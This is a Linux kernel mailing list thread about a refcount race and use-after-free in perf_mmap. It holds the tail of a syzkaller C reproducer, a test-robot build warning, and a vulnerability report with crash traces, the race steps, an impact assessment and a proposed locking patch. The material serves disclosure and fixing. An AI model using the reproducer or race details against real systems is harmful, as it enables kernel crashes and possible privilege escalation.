// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
Hi Haocheng,
kernel test robot noticed the following build warnings:
[auto build test WARNING on perf-tools-next/perf-tools-next]
[also build test WARNING on tip/perf/core perf-tools/perf-tools linus/master v6.19-rc7 next-20260130]
[cannot apply to acme/perf/core]
[If your patch is applied to the wrong git tree, kindly drop us a note.
And when submitting patch, we suggest to use '--base' as documented in
https://git-scm.com/docs/git-format-patch#_base_tree_information]
url: https://github.com/intel-lab-lkp/linux/commits/Haocheng-Yu/perf-core-Fix-refcount-bug-and-potential-UAF-in-perf_mmap/20260201-193746
base: https://git.kernel.org/pub/scm/linux/kernel/git/perf/perf-tools-next.git perf-tools-next
patch link: https://lore.kernel.org/r/20260201113446.4328-1-yuhaocheng035%40gmail.com
patch subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
config: mips-randconfig-r072-20260201 (https://download.01.org/0day-ci/archive/20260202/202602020208.m7KIjdzW-lkp@intel.com/config)
compiler: clang version 22.0.0git (https://github.com/llvm/llvm-project 9b8addffa70cee5b2acc5454712d9cf78ce45710)
smatch version: v0.5.0-8994-gd50c5a4c
If you fix the issue in a separate patch/commit (i.e. not just a new version of
the same patch/commit), kindly add following tags
| Reported-by: kernel test robot <lkp@intel.com>
| Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
smatch warnings:
kernel/events/core.c:7183 perf_mmap() warn: inconsistent indenting
vim +7183 kernel/events/core.c
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7131
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7132 static int perf_mmap(struct file *file, struct vm_area_struct *vma)
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7133 {
cdd6c482c9ff9c kernel/perf_event.c Ingo Molnar 2009-09-21 7134 struct perf_event *event = file->private_data;
81e026ca47b386 kernel/events/core.c Thomas Gleixner 2025-08-12 7135 unsigned long vma_size, nr_pages;
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7136 mapped_f mapped;
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7137 int ret;
d57e34fdd60be7 kernel/perf_event.c Peter Zijlstra 2010-05-28 7138
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7139 /*
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7140 * Don't allow mmap() of inherited per-task counters. This would
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7141 * create a performance issue due to all children writing to the
76369139ceb955 kernel/events/core.c Frederic Weisbecker 2011-05-19 7142 * same rb.
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7143 */
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7144 if (event->cpu == -1 && event->attr.inherit)
c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7145 return -EINVAL;
4ec8363dfc1451 kernel/events/core.c Vince Weaver 2011-06-01 7146
43a21ea81a2400 kernel/perf_counter.c Peter Zijlstra 2009-03-25 7147 if (!(vma->vm_flags & VM_SHARED))
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7148 return -EINVAL;
26cb63ad11e040 kernel/events/core.c Peter Zijlstra 2013-05-28 7149
da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7150) ret = security_perf_event_read(event);
da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7151) if (ret)
da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7152) return ret;
26cb63ad11e040 kernel/events/core.c Peter Zijlstra 2013-05-28 7153
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7154 vma_size = vma->vm_end - vma->vm_start;
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7155 nr_pages = vma_size / PAGE_SIZE;
ac9721f3f54b27 kernel/perf_event.c Peter Zijlstra 2010-05-27 7156
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7157 if (nr_pages > INT_MAX)
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7158 return -ENOMEM;
9a0f05cb368885 kernel/events/core.c Peter Zijlstra 2011-11-21 7159
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7160 if (vma_size != PAGE_SIZE * nr_pages)
0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7161 return -EINVAL;
45bfb2e50471ab kernel/events/core.c Peter Zijlstra 2015-01-14 7162
d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7163 scoped_guard (mutex, &event->mmap_mutex) {
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7164 /*
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7165 * This relies on __pmu_detach_event() taking mmap_mutex after marking
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7166 * the event REVOKED. Either we observe the state, or __pmu_detach_event()
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7167 * will detach the rb created here.
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7168 */
d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7169 if (event->state <= PERF_EVENT_STATE_REVOKED)
d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7170 return -ENODEV;
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7171
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7172 if (vma->vm_pgoff == 0)
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7173 ret = perf_mmap_rb(vma, event, nr_pages);
5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7174 else
2aee3768239133 kernel/events/core.c Peter Zijlstra 2025-08-12 7175 ret = perf_mmap_aux(vma, event, nr_pages);
07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7176 if (ret)
07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7177 return ret;
07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7178
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7179 /*
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7180 * Since pinned accounting is per vm we cannot allow fork() to copy our
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7181 * vma.
9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7182 */
1c71222e5f2393 kernel/events/core.c Suren Baghdasaryan 2023-01-26 @7183 vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7184 vma->vm_ops = &perf_mmap_vmops;
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7185
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7186 mapped = get_mapped(event, event_mapped);
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7187 if (mapped)
da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7188 mapped(event, vma->vm_mm);
1e0fb9ec679c92 kernel/events/core.c Andy Lutomirski 2014-10-24 7189
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7190 /*
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7191 * Try to map it into the page table. On fail, invoke
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7192 * perf_mmap_close() to undo the above, as the callsite expects
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7193 * full cleanup in this case and therefore does not invoke
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7194 * vmops::close().
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7195 */
191759e5ea9f69 kernel/events/core.c Peter Zijlstra 2025-08-12 7196 ret = map_range(event->rb, vma);
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7197 if (ret)
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7198 perf_mmap_close(vma);
8f75f689bf8133 kernel/events/core.c Haocheng Yu 2026-02-01 7199 }
f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7200
7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7201 return ret;
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7202 }
37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7203
--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
|
{
"author": "kernel test robot <lkp@intel.com>",
"date": "Mon, 2 Feb 2026 02:43:48 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
